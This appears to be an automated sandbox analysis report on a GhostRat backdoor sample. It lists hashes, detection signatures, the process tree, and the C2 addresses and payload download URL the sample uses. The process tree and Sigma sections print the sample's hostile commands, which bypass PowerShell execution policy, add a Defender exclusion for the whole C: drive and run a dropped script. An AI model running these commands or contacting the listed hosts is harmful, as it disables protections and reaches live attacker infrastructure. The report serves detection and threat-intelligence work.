
Windows Analysis Report
leBwnyHIgx.exe

Overview

General Information

Sample name: leBwnyHIgx.exe (renamed because original name is a hash value)
Original sample name: 51434b554c4e3b123e0a90db3048ec6d5edaed4cdb245c8f9e3dbddb378f2845.exe
Analysis ID: 1585743
MD5: 2a7776214c4870137fe8aabb231cf52e
SHA1: 3134458ad9ff7a6e76543427794fbcee1d7eda07
SHA256: 51434b554c4e3b123e0a90db3048ec6d5edaed4cdb245c8f9e3dbddb378f2845
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009

Detection

GhostRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • leBwnyHIgx.exe (PID: 2004 cmdline: "C:\Users\user\Desktop\leBwnyHIgx.exe" MD5: 2A7776214C4870137FE8AABB231CF52E)
    • cmd.exe (PID: 6540 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2032 cmdline: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • WmiPrvSE.exe (PID: 2492 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • leBwnyHIgx.exe (PID: 180 cmdline: "C:\Users\user\AppData\Roaming\leBwnyHIgx.exe" MD5: 2A7776214C4870137FE8AABB231CF52E)
      • cmd.exe (PID: 2180 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5684 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2664 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5444 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 5928 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6616 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 2916 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6100 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
{"C2 url": ["154.82.85.107:15091", "154.82.85.107:15092"]}
Source | Rule | Description | Author | Strings
00000005.00000003.2572510543.0000000004251000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000005.00000003.3807432806.00000000041E1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000005.00000003.3107343124.0000000003FE6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000005.00000003.3504281885.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000005.00000003.2572570751.0000000004251000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
(5 of 33 entries shown)

Source | Rule | Description | Author | Strings
5.2.leBwnyHIgx.exe.44e05eb.12.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
5.3.leBwnyHIgx.exe.4252c53.12.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
5.3.leBwnyHIgx.exe.428486b.37.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
5.2.leBwnyHIgx.exe.4252c53.9.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
5.3.leBwnyHIgx.exe.4252c53.30.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
(5 of 79 entries shown)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\leBwnyHIgx.exe", ParentImage: C:\Users\user\Desktop\leBwnyHIgx.exe, ParentProcessId: 2004, ParentProcessName: leBwnyHIgx.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6540, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\leBwnyHIgx.exe", ParentImage: C:\Users\user\Desktop\leBwnyHIgx.exe, ParentProcessId: 2004, ParentProcessName: leBwnyHIgx.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 2916, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2916, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 6100, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6540, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2032, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\leBwnyHIgx.exe", ParentImage: C:\Users\user\Desktop\leBwnyHIgx.exe, ParentProcessId: 2004, ParentProcessName: leBwnyHIgx.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6540, ProcessName: cmd.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6540, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2032, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T07:15:33.044544+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 154.82.85.107 | 15091 | TCP
2025-01-08T07:16:43.500651+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 154.82.85.107 | 15091 | TCP
2025-01-08T07:17:55.290074+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 50009 | 154.82.85.107 | 15091 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T07:15:05.390726+0100 | 2001046 | 3 | Misc activity | 47.79.48.230 | 443 | 192.168.2.4 | 49732 | TCP


AV Detection

Source: leBwnyHIgx.exe.180.5.memstrmin; Malware Configuration Extractor: GhostRat {"C2 url": ["154.82.85.107:15091", "154.82.85.107:15092"]}
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; ReversingLabs: Detection: 23%
Source: leBwnyHIgx.exe; Virustotal: Detection: 29%
Source: leBwnyHIgx.exe; ReversingLabs: Detection: 23%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.6% probability
Source: leBwnyHIgx.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown; HTTPS traffic detected: 47.79.48.230:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: leBwnyHIgx.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Release\Code_Shellcode.pdb source: leBwnyHIgx.exe, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: leBwnyHIgx.exe, 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbu source: powershell.exe, 0000000B.00000002.1806539404.0000000006E91000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb0 source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb{/; source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: z:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: x:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: v:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: t:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: r:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: p:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: n:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: l:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: j:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: h:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: f:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: b:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: y:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: w:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: u:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: s:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: q:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: o:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: m:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: k:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: i:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: g:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: e:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: c:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: [:
Source: C:\Users\user\Desktop\leBwnyHIgx.exe; Code function: 0_2_0040C86C FindFirstFileW,FindClose,0_2_0040C86C
Source: C:\Users\user\Desktop\leBwnyHIgx.exe; Code function: 0_2_0040C2A0 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_0040C2A0
Source: C:\Users\user\Desktop\leBwnyHIgx.exe; Code function: 0_2_00650754 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,0_2_00650754
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; Code function: 5_2_0040C86C FindFirstFileW,FindClose,5_2_0040C86C
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; Code function: 5_2_0040C2A0 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,5_2_0040C2A0
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; Code function: 5_2_00650754 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,5_2_00650754
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; Code function: 5_2_030780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,5_2_030780F0

Networking

Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49740 -> 154.82.85.107:15091
Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49741 -> 154.82.85.107:15091
Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50009 -> 154.82.85.107:15091
Source: Malware configuration extractor; URLs: 154.82.85.107:15091
Source: Malware configuration extractor; URLs: 154.82.85.107:15092
Source: global traffic; TCP traffic: 154.82.85.107 ports 18852,8853,15092,15091,3,5,8
Source: global traffic; TCP traffic: 192.168.2.4:49730 -> 154.82.85.107:8853
Source: Joe Sandbox View; ASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic; Suricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 47.79.48.230:443 -> 192.168.2.4:49732
Source: unknown; TCP traffic detected without corresponding DNS query: 154.82.85.107 (50 occurrences)
Source: C:\Users\user\Desktop\leBwnyHIgx.exe; Code function: 0_2_00421DFC VirtualAlloc,WSAStartup,socket,VirtualProtect,WriteProcessMemory,connect,recv,closesocket,0_2_00421DFC
Source: global traffic; HTTP traffic detected:
    GET /wpsv.5.6.3.exe HTTP/1.1
    User-Agent: URLDownloader
    Host: xrpy.oss-ap-southeast-1.aliyuncs.com
    Cache-Control: no-cache
Source: global traffic; DNS traffic detected: DNS query: xrpy.oss-ap-southeast-1.aliyuncs.com
Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: leBwnyHIgx.exe, 00000000.00000002.2078649644.0000000003906000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m76u8s
Source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000003.00000002.1703418182.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2029415416.000000000701B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000014.00000002.1996269596.0000000002971000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsof
Source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1780310479.00000000028CA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoft
Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000003.00000002.1706524566.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1762406995.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1795405452.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://ocsp.digicert.com0
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://ocsp.digicert.com0A
Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://ocsp.digicert.com0C
Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://s.symcd.com06
                      Source: powershell.exe, 00000013.00000002.2028829277.0000000006FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000005016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.0000000004271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000005016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
